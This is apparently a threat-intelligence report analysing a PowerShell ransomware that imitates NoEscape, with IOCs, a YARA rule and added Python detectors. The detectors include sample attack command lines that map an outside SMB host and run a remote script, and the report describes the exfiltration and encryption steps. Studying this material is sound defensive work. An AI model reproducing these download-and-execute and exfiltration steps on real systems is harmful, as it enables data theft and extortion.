Low-profile Threat Actor observed imitating NoEscape Ransomware

Key Takeaways

  • Cyble Research & Intelligence Labs (CRIL) discovered a BAT file interacting with an open directory.
  • Further investigation suggested that the batch file acts as a downloader for ransomware.
  • Our investigation indicates that the Threat Actor was actively testing the PowerShell-based ransomware, as evidenced by its evolution during our analysis.
  • This ransomware variant employs SMB shares for both data exfiltration and the distribution of ransom notes.
  • A differentiating factor between this variant and other ransomware is that it does not rename files after encryption, while masquerading as NoEscape Ransomware, as is evident from the ransom note it drops. The imitation is further suggested by the TA not including any communication channels or leak sites in the note.
  • In addition to the ransom note demanding 30 Bitcoin, the TA also claims to have compromised an educational institution.
  • CRIL has already reported on an existing NoEscape ransomware variant in the past. This variant operates on a Ransomware-as-a-Service (RaaS) model and uses double extortion.

Overview

Cyble Research & Intelligence Labs (CRIL) discovered an archive containing a batch file on VirusTotal.

Figure 1 – File on VirusTotal

Upon further examination of this batch file, we noticed that the PowerShell script it downloads was evolving over a period of 2 days. This indicates that the TA was likely still testing the ransomware.

To conduct this testing, the TA used an SMB share to exfiltrate data and to deliver the files used to encrypt the victim’s system. The same SMB share is also used to deliver the ransom note to victim systems.

Figure 2 – Open Directory

The contents of the ransom note indicate a potential imitation of the NoEscape ransomware: the note clearly states “NoEscape” at the top.

It is worth mentioning that the ransom demand specifies 30 Bitcoins, amounting to approximately USD 780,000, and claims to have compromised a university.

Here are our observations about the evolution of the ransomware:

  • Initially, this ransomware exfiltrated and encrypted files with a specific set of file extensions, and the encryption keys retrieved from the remote server were in plain text.
  • As the testing progressed, the TA added over 70 file extensions to the encryption process (as shown in Figure 3).
  • The encryption keys were later encoded in Base64. The TA also added a feature to identify the victim’s public IP address.

Figure 3 – Added File Extensions

After encrypting the files, the ransom note is fetched from an SMB share and displayed using Notepad.exe. The figure below shows the process tree.

Figure 4 – Process Tree

Technical Analysis

The infection begins with a batch file named “Readme.txt.bat”, which uses a double extension. The TA employs this naming tactic to deceive users into believing the file is a harmless text file, whereas in reality it is a malicious batch script.

This batch script connects to a remote SMB share using the Windows net utility, retrieves the PowerShell script file “combined.ps1” from the share, and executes it.

Figure 5 – Batch Script

The content of the PowerShell script is encoded with Base64 and then reversed. This technique is used to hide the script’s true nature and evade detection, as shown in the figure below.

Figure 6 – Obfuscated PowerShell Script
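An analyst looking at a script obfuscated this way needs to undo the two steps in the opposite order: reverse the string, then Base64-decode it. The following Python is an added example, not code from the report or from the threat actor’s script; the PowerShell snippet it encodes is a constructed stand-in, not the real combined.ps1 content. It also includes a heuristic for recognising a reversed Base64 blob: padding characters can only legitimately trail a Base64 string, so a blob that starts with “=” (or that only decodes to readable text backwards) has been reversed.

```python
"""Decoder for the reversed-Base64 obfuscation described above.

Added example (Python), not code from the report or from the threat actor's
script. SAMPLE_SCRIPT is a constructed stand-in, not the real combined.ps1.
"""
import base64
import binascii
import re

# Constructed sample script, used only to show the transformation.
SAMPLE_SCRIPT = "$fileTypes = @('.pdf', '.docx')\nWrite-Host 'constructed sample'\n"


def reverse_base64_encode(script: str) -> str:
    """Produce the obfuscated form: Base64-encode the text, then reverse the string."""
    return base64.b64encode(script.encode("utf-8")).decode("ascii")[::-1]


def _is_mostly_text(raw: bytes) -> bool:
    """True when the bytes decode as printable UTF-8 text (tabs and newlines allowed)."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def decode_reversed_base64(blob: str) -> str:
    """Undo the obfuscation: strip whitespace, reverse, then Base64-decode.

    PowerShell's own -EncodedCommand uses UTF-16LE, so a result containing NUL
    bytes is decoded that way; otherwise UTF-8 is assumed.
    """
    raw = base64.b64decode(re.sub(r"\s+", "", blob)[::-1], validate=True)
    if b"\x00" in raw:
        return raw.decode("utf-16-le")
    return raw.decode("utf-8")


def looks_reversed(blob: str) -> bool:
    """Heuristic: does this blob only yield readable text after reversal?

    A leading '=' is a giveaway, because Base64 padding can only trail a valid
    string. Otherwise compare the backward and forward decodes.
    """
    s = re.sub(r"\s+", "", blob)
    if s.startswith("="):
        return True
    try:
        backward = base64.b64decode(s[::-1], validate=True)
    except binascii.Error:
        return False
    try:
        forward = base64.b64decode(s, validate=True)
    except binascii.Error:
        forward = None
    forward_is_text = forward is not None and _is_mostly_text(forward)
    return _is_mostly_text(backward) and not forward_is_text


if __name__ == "__main__":
    obfuscated = reverse_base64_encode(SAMPLE_SCRIPT)
    print("obfuscated:", obfuscated)
    print("reversed? ", looks_reversed(obfuscated))
    print("recovered:\n" + decode_reversed_base64(obfuscated))
```

The forward/backward comparison is deliberately conservative: a blob that reads as text both ways is left alone, and a blob that decodes to binary both ways is reported as not reversed, so the function errs toward a miss rather than a false claim of obfuscation.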

This PowerShell script is composed of three main code blocks, each serving distinct functions.

Code Block 1: Data Exfiltration

In this code block, an array named $fileTypes is defined to list the file extensions that the script targets, first for exfiltration and then for encryption.

The script targets the following file extensions:

.pdf .csv .svg .kdbx .crt
.txt .xml .msg .tiff .cer
.xls .json .zip .key .pfx
.mdb .yml .bak .seed .ssh
.sql .yaml .wallet .qbw .conf
.doc .rtf .ods .pay .pst
.docx .psd .odt .ifx .ost
.ppt .ai .jks .sage .eml
.pptx .indd .db .sds .qbb
.xlsx .dwg .dat .123 .qbw
.accdb .dxf .keystore .peachtree .rdp
.odt .skp .snt .ini .config
.ods .cad .qfx .aws .htpasswd
.odp .eps .qb .credentials
.odb .ps .1password .ovpn

 

Additionally, an SMB share path, \\207.38.198[.]187\Exchange\BETO\1, is assigned to the variable $smbShare, and the script retrieves the victim’s public IP address using a GET request to ‘hxxp://ipinfo.io/ip’.

Then, a new SMB share path is created by appending the victim’s IP address to $smbShare, and the script checks whether this directory exists. If it does not, it is created using the New-Item cmdlet.

The figure below shows Code Block 1.

Figure 7 – Code Block 1 – Creating Directory

The TA creates these directories to separate the exfiltrated data of different victims, so that the stolen data is organized per victim.

The figure below shows the code for data exfiltration.

Figure 8 – Data Exfiltration

This PowerShell script iterates through all available local drives and, for each drive, scans for files of the types listed in the $fileTypes variable. This is done using the Get-ChildItem cmdlet to search recursively from the drive’s root directory.

For each discovered file, the script constructs a destination path within the designated SMB share, creating any required directories along the way, and copies the file to the share.

Code Block 2: File Encryption

This code block encrypts the files found on local drives. It iterates through each available drive using the Get-PSDrive cmdlet, targeting the file types specified in the $fileTypes array, and attempts to encrypt each matching file using the Rijndael algorithm.

The figure below shows the code for drive enumeration.

Figure 9 – Drive Enumeration

Code block 2 then fetches the Base64-encoded encryption key and Initialization Vector (IV) stored in a remote file on the SMB share: “\\207[.]38.198[.]187\Exchange\BETO\null[.]txt”

Since the encryption key and IV are stored in a file on the remote server rather than protected in any way, anyone who obtains them can decrypt the files. The following Base64-encoded content is fetched from the remote server:

  • Encryption key = GMOc/5uEaQQJ+3YMvV4kID02RZERA+Ywvihe3DcnXh0=
  • Initialization Vector = d6OJu2qgaW2HfESH/qCvJQ==

The script then decodes the Base64 values and passes them as parameters to the Rijndael encryption routine, as shown below.

Figure 10 – Encryption Algorithm

Notably, unlike most other ransomware variants, it does not rename files after encrypting them, which makes it harder to distinguish an encrypted file from an unencrypted one.

The figure below illustrates the encrypted file.

Figure 11 – Encrypted File
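Because the file name and extension survive encryption, triage cannot rely on a ransomware extension to find affected files. Two checks still work: the leading bytes no longer match what the extension promises, and the content is near-uniformly random. The Python below is an added example, not code from the report; the sample files are constructed inline, with a deterministic SHA-256 stream standing in for ciphertext. The block-alignment helper assumes the .NET defaults for RijndaelManaged (CBC mode, PKCS7 padding, 128-bit block), which the report does not state; it is offered only as a supporting signal.

```python
"""Spotting encrypted files that keep their original names.

Added example (Python), not code from the report. Sample files are
constructed inline; _pseudo_random() is a deterministic stand-in for ciphertext.
"""
import hashlib
import math
from collections import Counter
from typing import Dict

# Expected leading bytes for a few extensions in the ransomware's target list.
MAGIC = {
    ".pdf": (b"%PDF",),
    ".zip": (b"PK\x03\x04", b"PK\x05\x06"),
    ".docx": (b"PK\x03\x04",), ".xlsx": (b"PK\x03\x04",), ".pptx": (b"PK\x03\x04",),
    ".doc": (b"\xd0\xcf\x11\xe0",), ".xls": (b"\xd0\xcf\x11\xe0",),
    ".ppt": (b"\xd0\xcf\x11\xe0",), ".msg": (b"\xd0\xcf\x11\xe0",),
    ".rtf": (b"{\\rtf",), ".psd": (b"8BPS",),
    ".kdbx": (b"\x03\xd9\xa2\x9a",), ".pst": (b"!BDN",),
}
# Extensions whose content is normally plain text.
TEXT_EXTS = {".txt", ".csv", ".xml", ".json", ".yml", ".yaml", ".sql", ".ini",
             ".conf", ".config", ".ovpn", ".htpasswd", ".svg", ".eml", ".rdp"}
PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}
ENTROPY_THRESHOLD = 7.2   # bits per byte; plain text sits well below this
MIN_SIZE = 256            # entropy of very small files is not meaningful


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, 0.0 for empty input and 8.0 for a uniform byte stream."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    return sum(b in PRINTABLE for b in data) / len(data) if data else 0.0


def block_aligned(data: bytes) -> bool:
    """Assumption: with .NET's default CBC/PKCS7 Rijndael, ciphertext is a multiple of 16 bytes."""
    return len(data) % 16 == 0


def classify(filename: str, data: bytes) -> str:
    """Return 'intact', 'likely_encrypted' or 'inconclusive' for a file whose name was kept."""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    high_entropy = len(data) >= MIN_SIZE and shannon_entropy(data) > ENTROPY_THRESHOLD
    if ext in MAGIC:
        if any(data.startswith(m) for m in MAGIC[ext]):
            return "intact"
        return "likely_encrypted" if high_entropy else "inconclusive"
    if ext in TEXT_EXTS:
        if printable_ratio(data) >= 0.95:
            return "intact"
        return "likely_encrypted" if high_entropy else "inconclusive"
    return "inconclusive"   # no expectation for this extension, entropy alone is not enough


def scan(files: Dict[str, bytes]) -> Dict[str, str]:
    return {name: classify(name, data) for name, data in files.items()}


def _pseudo_random(n: int, seed: bytes) -> bytes:
    """Deterministic high-entropy bytes (constructed stand-in for ciphertext)."""
    out, counter = bytearray(), 0
    while len(out) < n:
        out += hashlib.sha256(seed + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:n])


# Constructed sample files: each pair is an intact file and its encrypted twin under the same name.
SAMPLE_FILES = {
    "report.pdf": b"%PDF-1.7\n%constructed\n" + b"1 0 obj << /Type /Catalog >> endobj\n" * 20,
    "report_encrypted.pdf": _pseudo_random(4096, b"pdf"),
    "notes.txt": b"Quarterly notes, constructed sample text.\n" * 40,
    "notes_encrypted.txt": _pseudo_random(4096, b"txt"),
    "archive.zip": _pseudo_random(4096, b"zip"),        # header gone, random content
    "tiny_encrypted.pdf": _pseudo_random(48, b"tiny"),  # too small for entropy to decide
    "unknown.bin": _pseudo_random(4096, b"bin"),        # no expectation for .bin
}

if __name__ == "__main__":
    for name, verdict in scan(SAMPLE_FILES).items():
        print(f"{name:24s} {verdict}")
```

On a real host the same classify() would be fed from a directory walk restricted to the extension list above; files flagged likely_encrypted can then be prioritised for recovery, which in this case is feasible because the key and IV were recoverable from the share.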

Code Block 3: Ransom Note

In the final code block, the script defines a remote file path “\\207.38.198.187\Exchange\BETO\RANSOM.txt” and a destination path on the user’s desktop obtained via “[Environment]::GetFolderPath('Desktop')”.

The script then copies the remote ransom note file (RANSOM.txt) to the user’s desktop.

The figure below shows the code to fetch the ransom note.

Figure 12 – Fetching the Ransom Note from the Remote Server

Finally, it opens the copied ransom note with Notepad using the command Start-Process "notepad.exe" -ArgumentList $destinationPath.

The figure below shows the ransom note.

Figure 13 – Ransom Note
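The whole infection leaves a short, distinctive process chain on the endpoint: cmd.exe launching a double-extension batch file, net.exe mapping an SMB share on an outside host, powershell.exe running a .ps1 from that share under cmd.exe, and notepad.exe opening RANSOM.txt on the Desktop as a child of PowerShell. The Python below is an added example, not code from the report, that runs these four checks over constructed Sysmon-style process-creation events and escalates when the full chain is present. The command lines, user path, PIDs and the SMB host 203.0.113.10 (a documentation address standing in for the attacker’s server) are all constructed, and INTERNAL_RANGES is an assumed allowlist of the organisation’s own file servers.

```python
"""Process-chain detection for the batch -> net use -> combined.ps1 -> notepad sequence.

Added example (Python), not code from the report. Events are constructed
Sysmon-style process creations; 203.0.113.10 stands in for the attacker's
SMB server and INTERNAL_RANGES is an assumed allowlist.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # full path of the created process
    cmdline: str   # command line as logged


SAMPLE_EVENTS = [
    ProcEvent(100, 10, r"C:\Windows\explorer.exe", "explorer.exe"),
    # The chain from the analysis, with constructed paths and PIDs.
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c "C:\Users\victim\Downloads\Readme.txt.bat"'),
    ProcEvent(201, 200, r"C:\Windows\System32\net.exe",
              r"net use Z: \\203.0.113.10\Exchange\BETO"),
    ProcEvent(202, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File Z:\combined.ps1"),
    ProcEvent(203, 202, r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\victim\Desktop\RANSOM.txt"),
    # Benign activity that must not fire.
    ProcEvent(300, 100, r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\victim\Documents\todo.txt"),
    ProcEvent(301, 100, r"C:\Windows\System32\net.exe",
              r"net use H: \\10.20.0.5\home"),
]

# Assumed allowlist: the organisation's own SMB servers live in RFC 1918 space.
INTERNAL_RANGES = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

DOUBLE_EXT_RE = re.compile(r"\.(?:txt|pdf|doc|docx|xls|xlsx|jpg|png)\.(?:bat|cmd)\b", re.I)
NET_USE_RE = re.compile(r"\bnet(?:\.exe)?\s+use\b.*?\\\\(\d{1,3}(?:\.\d{1,3}){3})\\", re.I)
# A .ps1 given as a UNC path or on a non-system drive letter (crude mapped-drive heuristic).
SCRIPT_FROM_SHARE_RE = re.compile(r"(?:\\\\\S+|\b[D-Z]:)[^\s\"']*\.ps1\b", re.I)
RANSOM_NOTE_RE = re.compile(r"\\Desktop\\RANSOM\.txt\b", re.I)

CHAIN = ("double_extension_batch", "smb_to_external_host",
         "powershell_script_from_share", "ransom_note_displayed")


def is_external(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_RANGES)


def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()


def detect_chain(events: List[ProcEvent]) -> List[Dict[str, object]]:
    """Apply the four stage rules; each alert records the stage, PID and parent image."""
    by_pid = {e.pid: e for e in events}
    alerts: List[Dict[str, object]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name, pname = _name(e.image), (_name(parent.image) if parent else "")
        rule = None
        if name == "cmd.exe" and DOUBLE_EXT_RE.search(e.cmdline):
            rule = "double_extension_batch"            # Masquerading, T1036.007
        elif name == "net.exe":
            m = NET_USE_RE.search(e.cmdline)
            if m and is_external(m.group(1)):
                rule = "smb_to_external_host"          # unusual SMB connection
        elif name == "powershell.exe" and pname == "cmd.exe" and SCRIPT_FROM_SHARE_RE.search(e.cmdline):
            rule = "powershell_script_from_share"     # Command and Scripting Interpreter, T1059
        elif name == "notepad.exe" and pname == "powershell.exe" and RANSOM_NOTE_RE.search(e.cmdline):
            rule = "ransom_note_displayed"
        if rule:
            alerts.append({"rule": rule, "pid": e.pid, "parent": pname, "cmdline": e.cmdline})
    return alerts


def chain_complete(alerts: List[Dict[str, object]]) -> bool:
    """True when every stage of the chain has fired; worth an immediate escalation."""
    seen = {a["rule"] for a in alerts}
    return all(r in seen for r in CHAIN)


if __name__ == "__main__":
    found = detect_chain(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a['rule']}] pid={a['pid']} parent={a['parent']} :: {a['cmdline']}")
    print("full chain:", chain_complete(found))
```

Each stage is a useful alert on its own (the external SMB mapping in particular matches the report’s recommendation to watch for unusual SMB connections), but requiring the parent relationships keeps the notepad.exe and .ps1 rules from firing on ordinary user activity.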

Conclusion

This ransomware appears to be in a testing phase, as indicated by the evolution we have observed over 2 days. The imitation of the well-known NoEscape ransomware, with its large Bitcoin ransom demand and claims of hacking a university, makes this variant particularly interesting.

What really raised our suspicions, however, is that the ransom note does not mention any leak site or means of communication. It is also worth mentioning that the attackers did not use the same methods as NoEscape, such as double extortion.

The lack of sophistication is further evident in the accessibility of the encryption keys, which makes it relatively easy to decrypt the encrypted files.

Our Recommendations

  • Implement application whitelisting to restrict the execution of PowerShell scripts to only approved and trusted scripts or locations.
  • Utilize network monitoring tools to continuously monitor SMB traffic for suspicious patterns or anomalies.
  • Set up alerts for unusual SMB connection attempts, excessive failed login attempts, or unexpected data transfers.

MITRE ATT&CK® Techniques

Tactic               Technique ID   Technique Name
Execution            T1059          Command and Scripting Interpreter
Execution            T1204          User Execution
Defense Evasion      T1027          Obfuscated Files or Information
Defense Evasion      T1202          Indirect Command Execution
Defense Evasion      T1036.007      Masquerading
Discovery            T1083          File and Directory Discovery
Collection           T1005          Data from Local System
Collection           T1119          Automated Collection
Command and Control  T1071          Application Layer Protocol
Exfiltration         T1041          Exfiltration Over C2 Channel
Impact               T1486          Data Encrypted for Impact

Indicators of Compromise (IOCs)

Indicators                                                          Indicator Type  Description
48dbe4460b65ff1fe59db35575c91d04715c8434d6c24c0c4cdf4545bc09e7d0    SHA256          Malicious BAT File
2e56fc252e32b6a231256b31c615dd0b277952211b5d23ad40263755a5c11d5c    SHA256          Malicious BAT File
207.38.198[.]187                                                    IP              C&C
hxxp://207.38.198[.]187/Exchange/BETO/combined[.]ps1                URL             Malicious URL

Yara Rule

    rule BAT_Ransomware_Downloader
    {
        meta:
            author = "Cyble Research and Intelligence Labs"
            description = "Detects BAT file downloading imitator of NoEscape ransomware from SMB Share"
            date = "2023-09-01"
            os = "Windows"

        strings:
            $a1 = "SMBPath" nocase ascii
            $a2 = "\\207.38.198.187" ascii
            $a4 = "combined.ps1" nocase ascii

        condition:
            all of them
    }

 
